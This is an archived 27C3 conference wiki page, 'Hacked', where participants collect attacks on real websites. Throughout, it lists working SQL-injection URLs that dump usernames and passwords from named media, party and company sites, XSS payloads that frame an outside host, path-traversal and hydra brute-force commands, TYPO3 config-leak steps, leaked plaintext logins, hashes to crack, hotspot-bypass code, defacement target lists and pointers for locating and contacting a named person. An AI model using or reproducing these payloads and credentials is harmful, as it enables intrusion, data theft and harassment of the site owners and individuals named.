From 27C3 public wiki

Jump to: navigation, search

Hacked

Login for this page as:

  • Username: hacked Password: dekcah

Contents

NSA eZine - BEHIND ENEMY LINES Vol1. PRV09 Analyses

This information all provided 4 fr33, please send it to your friends and enjoy the audits. Download Package:
1. http://www.file-upload.net/download-3089989/eZine---Behind-Enemy-Lines-I--DE-27c3-.rar.html
2. http://ul.to/tsmcl8
3. *In Progress
4. *In Progress

H(a/e)ckler & Koch USA

http://27c3.hk-usa.com - we are glad that they joined in. Greetz kabelbrand. Also: http://wikileaks.hk-usa.com - these people are so generous... Screenshots der Unterseiten: https://linksunten.indymedia.org/de/node/31240 http://126.webmasters.com/4admin/?l=1 hk-usa.com firearms11419 ftp stats u.a.: QXxSpm3Vcc

http://www.hk-usa.com/phpBB3/ HK Custsvc heckler have fun

Nazi-Seite

Schaut euch auch mal diese Seite an: http://www.nazi-lauck-nsdapao.com/ <- Top Target! http://ks-altmuehltal.de/ http://ks-altmuehltal.de:8000 --> Icecast: radio-fsn.de Wenn das keine pure Provokation und Herausforderung ist.

Hier das selbe: http://widerstand-weiden.de |<- ist der selbe server ...gibt afaik 4 oder 5 domins die auf den server zeigen some docs on the registrant: Use whois for personal data. facebook: http://www.facebook.com/profile.php?id=100000518266513 home adress maybe not actual anymore, try calling him and ask nazipack freunde nennen sich weisse woelfe Auf einem anderen liegt jedoch: http://www.radio-fsn-versand.de

  • 1. Account auf dem Server:
    • wa6136:lena2003
      • doesn't work
    • privilege escalation possible?

Antwort vom Hoster

1. Antwort http://pastebin.ca/2031907 2. Antwort http://pastebin.ca/2031940


XSS @ www.radio-fsn.de

Long search & win! <3 I got one. (;

By: bursali
Picture: http://www.abload.de/img/radios-fsnnbch.png
PoC:
First, go to the shop & put something to the basket.
Then, change the link to: http://www.radio-fsn.de/versand/bestellung
Start e.g. "HackBar", activate the "Enable Post data"-Feature and c&p this to the "Post Data" field:
"in_form=1&vorname=&nachname=&strasse=&ort=&epost="><IFRAME style="position:fixed;top:0;left:0;z-index:9999999;" SRC="http://bursali.eu/df/nmfs.php" width="100%" height="1250"></IFRAME>&anmerkungen=&land=tr&agb=1"

XSS @ radio-fsn-versand.de

By: bursali
Picture: http://img689.imageshack.us/img689/3982/65575750.png
PoC: http://radio-fsn-versand.de/s2dlogin.php?basket_id=%22%3E%3CIFRAME%20style=%22position:fixed;%20top:0;%20left:0;%20z-index:9999999;%22%20SRC=%22http://www.bursali.eu/df/nmfs.php%22%20width=%22100%%22%20height=%221250%22%20%3E%3C/IFRAME%3E&redirect=7068702e70696873643273

Junge Nationalfaschisten

http://www.jn-bw.de/index.php?option=com_virtuemart&Itemid=[SQL?] (http://www.exploit-db.com/exploits/10407/) Da sollte doch was gehen....


www.jlosachsen.de

offizielle veranstalter des größten naziaufmarsches in sachsen am 13. - 14. februar in dresden

-->joomla cms...

http://www.jlosachsen.de/configuration.php-dist --> aber sehr alte Version kennt wer gute Exploits dafür?

CDU/FPÖ Hacks

strange: http://cdu.de/db/tsearch.php sql error, bevor das cookie abgelegt wird. mal anschaun.

http://www.fpoe.at/spezialseiten/suche/?tx_solr[q]=%27+OR+1+%3D+2&id=129 Can somebody analyse this? Seems like a working SQL-Injection.

http://webcache.googleusercontent.com/search?q=cache:Z7Sp3MH7X4MJ:www.cdurlp.de/no_cache/w3c/pressestelle/termine/index.html%3Ftx_jwcalendar_pi1%255Buid%255D%3D44%26tx_jwcalendar_pi1%255Bview%255D%3DLIST%26tx_jwcalendar_pi1%255Bbegin%255D%3D1277222400%26tx_jwcalendar_pi1%255Bfirstuid%255D%3D1225%26cHash%3D51c3271ac7+site:cdurlp.de+warning&cd=1&hl=de&ct=clnk&gl=de&client=firefox-a ->damn old cms

-> http://www.cdurlp.de/index.php?id=5&jumpurl=typo3conf/localconf.php&juSecure=abc&juHash=781592e913&locationData=5:pages:5 Have fun with database data =) ($typo3_db etc.) -> http://cdurlp.de/typo3/install/ (PW is joh316) (You can create admin user at point2 "Database Analyzer")


FPÖ Site: http://www.giebelkreuzregime.at/index.php?sid=item&iid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,0x2f6574632f706173737764,7,8,9--

hemecht-an-natur.lu 

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-2005123
  • Main website running NPD CMS (anybody got the sourcecode of that CMS?)
  • RPC on Port 111
  • mySQL 5.0.51a-24+lenny3 on Port 3306
  • Some strange HTTP server on port 53729
  • Nmap output: 
Starting Nmap 5.21 ( http://nmap.org ) at 2010-12-30 13:34 CET
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 13:34
Scanning hemecht-an-natur.lu (94.102.210.22) [2 ports]
Completed Ping Scan at 13:34, 1.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:34
Completed Parallel DNS resolution of 1 host. at 13:34, 0.01s elapsed
Initiating Connect Scan at 13:34
Scanning hemecht-an-natur.lu (94.102.210.22) [1000 ports]
Discovered open port 25/tcp on 94.102.210.22
Discovered open port 22/tcp on 94.102.210.22
Discovered open port 443/tcp on 94.102.210.22
Discovered open port 80/tcp on 94.102.210.22
Discovered open port 993/tcp on 94.102.210.22
Discovered open port 111/tcp on 94.102.210.22
Discovered open port 110/tcp on 94.102.210.22
Discovered open port 3306/tcp on 94.102.210.22
Discovered open port 995/tcp on 94.102.210.22
Discovered open port 143/tcp on 94.102.210.22
Discovered open port 21/tcp on 94.102.210.22
Increasing send delay for 94.102.210.22 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 94.102.210.22 from 5 to 10 due to max_successful_tryno increase to 5
Discovered open port 873/tcp on 94.102.210.22
Completed Connect Scan at 13:34, 14.39s elapsed (1000 total ports)
Initiating Service scan at 13:34
Scanning 12 services on hemecht-an-natur.lu (94.102.210.22)
Completed Service scan at 13:35, 24.47s elapsed (12 services on 1 host)
Initiating RPCGrind Scan against hemecht-an-natur.lu (94.1 at 13:35
Completed RPCGrind Scan against hemecht-an-natur.lu (94.1 at 13:35, 0.06s elapsed (1 port)
NSE: Script scanning 94.102.210.22.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 13:35
Completed NSE at 13:35, 5.29s elapsed
NSE: Script Scanning completed.
Nmap scan report for hemecht-an-natur.lu (94.102.210.22)
Host is up (0.056s latency).
rDNS record for 94.102.210.22: 1a-7690.antagus.de
Not shown: 988 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 2.0.7
22/tcp   open  ssh      OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 1024 8d:ba:19:c4:29:f5:37:78:60:19:dc:b7:74:9e:60:19 (DSA)
|_2048 57:7f:31:04:35:df:77:a8:8c:4e:c9:43:1d:fb:17:ea (RSA)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: EHLO 1A-7690.antagus.de, PIPELINING, SIZE 20480000, VRFY, ETRN, STARTTLS, AUTH LOGIN PLAIN, AUTH=LOGIN PLAIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http     Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Neies - Hemecht an Natur Luxembourg
|_http-favicon: Unknown favicon MD5: A11C30EB6DAE1BB3D2E52D4B9F203A54
110/tcp  open  pop3     Dovecot pop3d
|_pop3-capabilities: USER CAPA UIDL TOP OK(K) RESP-CODES PIPELINING STLS SASL(PLAIN)
111/tcp  open  rpcbind  2 (rpc #100000)
| rpcinfo:  
| 100000  2    111/udp  rpcbind  
| 100024  1  54036/udp  status   
| 100000  2    111/tcp  rpcbind  
|_100024  1  53729/tcp  status   
143/tcp  open  imap     Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS AUTH=PLAIN UNSELECT THREAD=REFERENCES STARTTLS IMAP4rev1 NAMESPACE SORT CHILDREN LITERAL+ IDLE SASL-IR MULTIAPPEND
443/tcp  open  ssl/http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Parallels Confixx
873/tcp  open  rsync    (protocol version 30)
993/tcp  open  ssl/imap Dovecot imapd
|_sslv2: server still supports SSLv2
|_imap-capabilities: LOGIN-REFERRALS UNSELECT THREAD=REFERENCES AUTH=PLAIN IMAP4rev1 NAMESPACE SORT CHILDREN LITERAL+ IDLE SASL-IR MULTIAPPEND
995/tcp  open  ssl/pop3 Dovecot pop3d
|_sslv2: server still supports SSLv2
|_pop3-capabilities: OK(K) CAPA RESP-CODES UIDL PIPELINING USER TOP SASL(PLAIN)
3306/tcp open  mysql    MySQL 5.0.51a-24+lenny3
| mysql-info: Protocol: 10
| Version: 5.0.51a-24+lenny3
| Thread ID: 835603
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_Salt: y2+~]65GC]*VRz/v,pts
Service Info: Host:  1A-7690.antagus.de; OSs: Unix, Linux

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds

ZDF

Table dump:http://pressetreff.zdf.de/index2.asp?nFormatType=100015&nPageNumber=1&orderby=&orderbyDir=&search=%27%2C%27a%27%29%3D0%29+union+all+select+1%2Ctable%5Fschema%2Ctable%5Fname%2Ccolumn%5Fname%2C5%2C6+from+information%5Fschema%2Ecolumns+%2D%2D

Password/Username cleartext dump: http://pressetreff.zdf.de/index2.asp?nFormatType=100015&nPageNumber=1&orderby=&orderbyDir=&search=','a')=0)+union+all+select+id_user,user_name,user_fullname,user_pwd,5,6+from+dbo.GKPUser+--

Nice many "password", clear passwords or "*" as login for "Admin"... These usernames also work for bilderdienst.zdf.de :) (not Admin)

recursive wget-dump of pressetreff.zdf.de

KVB

Archivierte Dienstpläne, und allerlei der Kölner Verkehrs-Betriebe: http://kvb-koeln.de/module/

Der Mofi Generator wird glaub ich auch direkt für die Haltestellen genutzt. Also legt los ;-) Hier eine Textvorlage: +++ Unfassbar: Sie glauben wirklich, dass die Zeitangaben auf diesen Info-Tafeln stimmen? Hahahaha, sind Sie naiv. Ihre KVB... We Come in Peace +++

Dumped files (wget -m): magnet:?xt=urn:btih:f3d889b8d76929296fa596e3553602447fbb018b&dn=kvb-koeln.de.tar.xz or http://uploaded.to/file/57aaqq

Piwik

Ich hab nen mini server (lighttpd 1.4.28, mysql 5.1, php 5.3.4) von mir umgestrickt und eine Installation von Piwik drauf gehaun:

http://84.200.214.102 User: ccc Pass: ccc123

Wer lust hat mit zu suchen ob/wie man das defacen (ob mit oder ohne login) kann ist herzlich willkommen. Source von Piwik findet man unter http://dev.piwik.org/trac - installiert ist der aktuelle trunk (bzw. 1.1b4).

> PwnD!

MATCHED by: Rem0ve
Picture: http://img196.imageshack.us/f/pwnd26385.png/
PoC: http://nopaste.info/420cb3b3e4.html
Comment: Gr33tz 2 x4

Defaced

exploit in demos

Multple vulns in multiple demos versions from here: http://tutech.de/22324714, used for some kind of regional democracy improvement. "Vendor" is informed ...

/dev/random

210/1027 hashs cracked with usernames and emails http://pastebin.com/PZF0xz2H PMs als html http://www.xup.in/dl,33775890/index.html/ PMs als TXT: https://linksunten.indymedia.org/system/files/data/2010/12/1285704069.txt Please read: http://forum.asgardversand.net/showthread.php?t=14664 stupid! :D Funny PM from the Naziboard: https://youpic.info/uimg/0/shot2.jpg

Foodhacks

-- Dunkin Dos -- Epic Fail ! Slogan collection for a more cost effective Dos:

  • "Ist dies das Arbeitsamt?"
  • "Oh, ich habe mein Geld vergessen..."
  • "Ist der Zuckerguss Glucosefrei?"
  • "Haben sie auch Berliner?"
  • "Gibts das auch mit Rind?"
  • "Ist der Donut auch wirklich tot?"
  • "Wurde der Donut nachhaltig produziert?"
  • "Enthält der Donut Spuren von Geflügel oder Nüssen?"
  • "Einmal mit Scharf, ohne Zwiebeln und Paprika bitte!"
  • "...mit Pommes rot/weiss bitte!"
  • "Do speak English? My English ill, so you speak slow, please. I want a... how do you call those thingies over there?"
  • "I want my money back! There is something missing, in the middle!"
  • "I have some keys... Can I sell my keys here? If you want keys, i got some keys for Tempelhof and I can sell you some keys ... " (lightning talks day 2: last speaker)

--Burger King --

-- Operation Payback --

  • Hi, I have a technical complaint about this burger, it's gone, like if somebody ate it. May I have my money back?

spread the word

  • DaPhix Prepay-Internet-Hotspot @ http://www.generatorhostels.com/en/berlin -> last years instructions don't work anymore. Ey, they improve! BUT: the SOAP service to create a new account can still be used. You can reach it directly from their free WLAN. :) Here is some ruby code to generate an account for free internet access: http://pastebin.com/LC2Pq84g (shorter PHP code is available at http://pastebin.com/v13tBxxL ). Other more or less interesting services can be found at http://192.168.11.1/services. Perhaps you want to get a full list of possible passwords using PropertyService:getProperty('password')? Feel free to play ;-)

Update: Meininger City Hostels (Hauptbahnhof): Last years hack was fixed, but the Soaphack above still works. Also, username "1" and password "berlin" gets you free internet -- without having to deal with Ruby!

  • ruby noobs should try complete path to savon.rb if it is not starting 
require 'rubygems'
#require 'Savon'
require '/var/lib/gems/1.8/gems/savon-0.8.1/lib/savon.rb'

Note: This hack is for debian only, which neuters rubygems.

  • require 'savon' with a small s works well on ruby 1.9.2

DaPhix hotspots are used by many Hostels, including Generator, Meininger and Baxpax. In case the SOAP trick shouldn work anymore, you can always use a DNS tunnel, for example iodine.

Some hostels got a fix during night of day 1 to day 2. Seems that they learned to not expose SOAP sell webservices via the hotspot.

Anyone got a working solution for the DaPhix Hotspot at Meininger Hostel Prenzlauer Berg?

harz-flirt.de

XSS

Please, make this section clean and nice, no lame XSS on random sites. XSS can be cool if it's stored XSS, allows you to write a webworm (SAMY! COME BACK!) or such. Thanks!

Persistent

Non-Persistent

because they ***** are still in heaven. /hate

Blaupunkt

Targets 

 * http://hannover-webcam.de it-expert. not.
 * http://nsrostock.de ( naziscum ... )
 * http://www.3dsupply.de > part 2 :D
 * http://panasonic.ch/?s=
 * just something to read <- local net-shop based in mecklenburg
 *  ligatt.com - ftp.ligatt.com user: greg pass: no1hacker  
 *  widerstand.info nmap
 *  logr.org <-- shared wordpress hosting for nazis nmap
       * http://logr.org/nsgreifswald/
 * http://forum.thiazi.net/
 * wir-sind-die-wende.de (wordpress 3.0.2, http://fnhessennet.fatcow.com/demog/wp-login.php)
 * npdfrankfurt.de (Joomla, geschützt durch [CT Security System|http://www.radiosunlight.de]
 * das NPD CMS, genutzt auf npd.de, npd-berlin.de, npdhessen.de, npd-bayern.de und vielen mehr
 * wolfsfront.com (vBulletin 3.8.4)
 * saschalobo.com [1]
 * facebook.com ;)
 * svz-styles.de (zerbasteltes wordpress)
 * twistedhypnosis.com Complete nmap scan with a whole bunch of open ports  (Incl. cpanel)
 * /|\ Why THIS page? The server is open like a barn. And of course because we can.
 * godhatesfags.com
 * kkk.bz
 * www.svp.ch
 * www.pnos.ch
 * mupinfo.de
 * volksfront-medien.org <-- use npd cms
 * levensboom.de
 * www.gez.de
 * www.pearl.de <- need a Java script expert on this, its asking for defacing...
 * www.billag.ch
 * www.sp-ps.ch
 * gema.de/
 * www.fsm.de
 * www.innocenceindanger.de
 * www.dtecnet.com
 * de.altermedia.info nmap
 * www.bzoe.at
 * www.bz-berlin.de
 * www.fpoe.at <- TOP Target ! ;)
 * www.hcstrache.at <- TOP Target ! ;)
 * atv.at
 * blog.oliver-gassner.de
 * 81.163.52.78 - (ip has changed) freebsd box which i set for fun, try hacking it.
 * www.stayfriends.de or .com
 * www.herrenknecht.de (typo3 and runs old vsFTPd 2.0.7)
 * hemecht-an-natur.lu (yes, there are also Nazi fucktards in .LU -_-) <-- use npd cms
 * https://www.htw-dresden.de/index/intern QM is the who?
 ** Could you create a "manual" feed for the folder of documents? :-)
 * a list of nazisites
* http://bahn.de or/and http://db.de (or any other Deutsche Bahn-Site)
* http://ks-altmuehltal.de/  <--- Nazi-shemale
* http://www.ioeb.uni-oldenburg.de/ <---Bertelsmann Bildungs U-Boot
* http://www.kreuz.net/ <--- Katholisten. Faschistisch, homophob, antisemitisch, Holocaustleugner usw.
** "Wie wird jemand homosexuell? (..) Homosexuell wird ein Mensch in der Pubertät, wenn er von älteren Homosexuellen verführt oder sexuell mißbraucht wird." von http://www.kreuz.net/article.10270.html 
** "Atheismus ist ein anderes Wort für Sexverfallenheit und Haß" http://www.kreuz.net/article.9045.html
** Siehe auch: http://www.kirchensumpf.to/2008/04/11/antisemitismus-bei-kreuznet/ http://de.wikipedia.org/wiki/Kreuz.net#Kontroversen http://www.kreuts.net/forum/index.php http://de-de.facebook.com/pages/Initiative-gegen-kreuznet/103329933046079 http://www.sueddeutsche.de/bayern/web-seite-kreuznet-lichtscheu-und-anonym-1.944938 http://www.queer.de/detail.php?article_id=13349 "Kath.net vertritt dagegen die längst überholte These, dass Schwule und Lesben "geheilt" werden können: Die "Theorie", dass Homosexualität nicht einfach mit Beten verändert werden kann, werde "immer wieder in der Praxis von etlichen Bekehrungen widerlegt." http://www.queer.de/detail.php?article_id=1406

 *http://www.b2dent.org/
 *it's typo 3, database is set up, if u are a typo3 guy, u can deface it, go for it, i have never worked with typo3
 *mysql user: b2dent334
 *mysql pass: wecomeinpeace
 *mysql host: db4free.net
 *mysql port: 3306

9live.de

would be nice if some "expert" take a look at this weak pages, thanks! 

   * http://web.9live.de/imperia
   * http://imperia.9live.de (redaktioneller zugriff) 
   * http://web.9live.de/test/
   * http://web.9live.de/cgi-bin
   * http://web.9live.de/claudia
   * http://web.9live.de/css
   * http://web.9live.de/css/WEB-INF
   * http://web.9live.de/programm (alte webseite)
   * http://web.9live.de/statistik
   * http://web.9live.de/erotik/
   * http://web.9live.de/games
   * http://web.9live.de/images
   * http://web.9live.de/newsletter
   * http://web.9live.de/videos
   * http://web.9live.de/js
   * http://web.9live.de/mediaStore/9live_internet/gewinnspielsatzung/folder000/folder005/
   * http://web.9live.de/espana/
   * http://web.9live.de/shop
   * http://web.9live.de/service
   * http://web.9live.de/daten/winnerticker_day.xml
   * http://web.9live.de/WEB-INF 
   * http://web.9live.de/portal/gs/feed.jsp?stationname=9Live&type=RLA 
       * http://web.9live.de/portal/gs/feed.jsp?stationname=../../../../../../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA
       * http://web.9live.de/portal/gs/feed.jsp?stationname=../../../../../../etc/../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA
       * http://web.9live.de/portal/gs/feed.jsp?stationname=../../../../../../home/../../../../../../../../../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA
       * bruteforce usernames (wordlist) on 9live-server: hydra -l home -p words web.9live.de http-post-form "/portal/gs/feed.jsp:login&stationname=../../../../../../home/^USER^/../../../../../../../../../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA:gs_sender.css" 
       filePath='/usr/share/tomcat5/webapps/portal/gs/' 
   * username to mail http://web.9live.de/portal/login/forgotpassword.jsp
   * http://web.9live.de/php-bin/lib/Adodb/tests/test-php5.php
   * full path disclosure (/export/www/CONTENT/9live-80/docs/php-bin/lib/Adodb/adodb-exceptions.inc.php): 
   :* < h1>Connecting mysqli...< /h1>ERROR: MySQL test requires a MySQL server on localhost, userid='admin', password=, database='test'
     Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)< h3>Tests Completed< /h3>curl http://web.9live.de/php-bin/lib/Adodb/tests/test-perf.php?testmysqli

Insecure Passwords 

 * http://ch.mymuesli.com/muesli/admin/ (user: ' or 1=1-- ; pass=' or 1=1--)
 * http://pressetreff.zdf.de/ see ZDF section

File Inclusions

http://www.gcz.ch/index.php?id=415&playerUid=0%20union%20all%20select%201,2,3,4,5,6,7,load_file(0x2f6574632f706173737764),9,10,11,21,31,41,5,16,17,18,19,20,21,22,23,24

SQL Injections

http://www.bedag.ch/news/news_d.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,concat(user,0xa,password,0xa,host),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20mysql.user--&jahr=2010

http://pastebin.info/72 http://www.dus-int.de/dus_en/medieninfo_detail/?id=-1%20UNION%20SELECT%201,2,@@datadir,4,5,6,7,8,9,10,11%20FROM%20auth_users--

Doesn't work?? create an account. Sure? http://img137.imageshack.us/img137/8329/cdugeschwrzt.png regarding to https://www.shop.cdu.de/main.php?suchbegriff=1&Kategorien=333333%20UNION%20SELECT%20table_name%20FROM%20INFORMATION_SCHEMA.tables%20LIMIT%2046,1%23

http://www.gcz.ch/index.php?id=415&playerUid=0%20union%20all%20select%201,2,3,4,5,6,user,%20password,9,host,11,21,31,41,5,16,17,18,19,20,21,22,23,24%20from%20mysql.user

http://www.gshc.ch/Calendrier/Feuille_match.php?id_calendrier=0%20union%20all%20select%201,npa,pseudo,password,5,6,email,8,9,10,11,12,13%20from%20users

http://www.tagesanzeiger.ch/wm2010/spielplan/player.html?playerid=0%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,host,%20user,%20password,14,15,16,17,18,19%20from%20mysql.user

http://www.daserste.de/tatort/teams.asp?iid=-1%20union%20all%20select%20system_user,@@version-- (fixed)

http://www.svp-stadt-zuerich.ch/?PageID=23&showDetails=-1%20union%20all%20select%201,2,3,password,5,username,7,8,9,10,11,12%20from%20svp_users

http://www.bademeister.com/v7/php/diskografie.php?tid=9999+union+all+select+1,pass,name,id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+bbdw_ttb_user--&p=3&a=10&aid=92

http://www.twoleftfeet.ch/comment.php?id=0%20union%20all%20select%201,2,column_name,4,5,6,table_name,8%20from%20information_schema.columns--

http://www.cdu-bonn.de/index.php?PRGDATEI=Nachrichtene.php&Gruppe=0&ID=-3909%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,concat_ws%28%27;%27,ID,ADMIN,VORNAME,NAME,EMAIL,BENUTZER,PASSWORD%29,91,92,93,94,95,96%20from%20Benutzer--+&ART=1 (the MD5 hash for pie.becker@gmx.de translates to 28252219)

Didn't work for me. But http://www.cdu-bonn.de/index.php?PRGDATEI=Nachrichtene.php&NEWSSORTETE=&Gruppe=1&ABFRAGEJAHR=2010%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,BENUTZER,15,16,17,18,19,20,21,22,23,24,25,PASSWORD,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96%20from%20Benutzer did.

Clans should upgrade their Clansphere, like http://www.exploit-db.com/exploits/15560/ suggests ...: http://www.royal-elite.eu/index.php?mod=replays&action=list&where=123%27%20union%20select%201,2,users_nick,users_pwd,5%20from%20cs_users%20--%20#

Happy little cloud

hashes to crack

46EA83AE992E10A43DD56FF4E3C2C84918980F57 (mysql)

AAD3B435B51404EEAAD3B435B51404EE:0744366FB9B73089AE392B8937182C1D (ntlm)

$1$7IzC.lOd$GtGD1Dkp7CZzkbSOuCr1F0 (root passwort from /etc/shadow)

6d2bb5d42c8321be2783fa847f161831 (md5)

Plaintext: "JASh2J." HEX: 4a 41 53 68 32 4a 2e

b614cb5d3fa744fb788e285ac3de612e (md5)

c8f85603eaeefd09b5cc1d1933427a22 (md5)

61904682c0fd1cabb2b1ff42e564c500 (md5, Asgard Forum: Username:admin)

Da lief doch ein vBulletin oder nicht? vBulletin = md5(md5($pass).$salt)) und in dem Tabelle gibts ne spalte Salt ;)

BC31095A7DA2A3206BDB3F1319CA5220 (Win LM)

Was this extracted OK? Can you provide the complete CAIN or pwdump/fgdump-output? The NTLM-Hash is needed to provide the exact password, LM will only yield Uppercase and strange mappings for certain special characters.

wpa-handshakes to crack

misc

http://www.wolfszeit.net/s2dbskt.php (Nazi-Shop) - Order something and edit the article price in the post request (http://imgur.com/ZMI83)

Typisch Nazis...große Schnauze nichts dahinter :D http://ks-altmuehltal.de/ (http://imgur.com/tZCq5)nmap zu nginx 0.6.32 (aus nmap) ... <0.6.38

hacked but working QR-Code for 27c3 : http://www.flickr.com/photos/docdiesel/5303532854/ (can be verified with online qr decoder at http://zxing.org)

old TYPO3

  • you'll find many old cms @ecosia.org ""typo3_src-4.1.1/typo3/sysext/" Change only the versionnumber..

Example: http://www.wirtschaftsmagazin-ruhr.de/index.php?id=4&jumpurl=typo3conf/localconf.php&juSecure=abc&juHash=abc&locationData=4:pages:4

  • search a Page with an existing ID (here 4)
  • open the link and copy the hash value (here: Calculated juHash, 3b85b28449)
  • rebuild the link and download the localconf.php

http://www.wirtschaftsmagazin-ruhr.de/index.php?id=4&jumpurl=typo3conf/localconf.php&juSecure=abc&juHash=3b85b28449&locationData=4:pages:4
Oh yes , see here this provider is so stupid min 20 Websites:
http://events.ccc.de/congress/2010/wiki/User_talk:Robocop

Fnord-Jahresrückblick 2010

  • 9 alarm clocks placed under chairs in the audience and 1 under the speakers table. they went off at 10:20 pm.

Open to the web

Thema: Kundendaten Online ... (offensichtlich) ahnungslose Schweizer .... Die redCOR AG hat viel Erfahrung ... http://www.redcor.ch/web/unsere_leistungen und doch alle Kundendaten im Netz: 

-> https://svn.redcor.net/svn/pub/  <-

Passwörter, Zugangsdaten, persönliche Nachrichten, Database Dumps (f. z.B. www.energie-cluster.ch) funktionieren u.v.m. ABER!: we come in peace -> Remember!

Presse

  • DWDL: Eulmeldung: DasErste.de gehackt: Eine Eule und der berühmte Sack Reis. Wir haben einen Screenshot: http://dwdl.de/sl/f4660a
Retrieved from "http://events.ccc.de/congress/2010/wiki/Hacked"
Archived page - Impressum/Datenschutz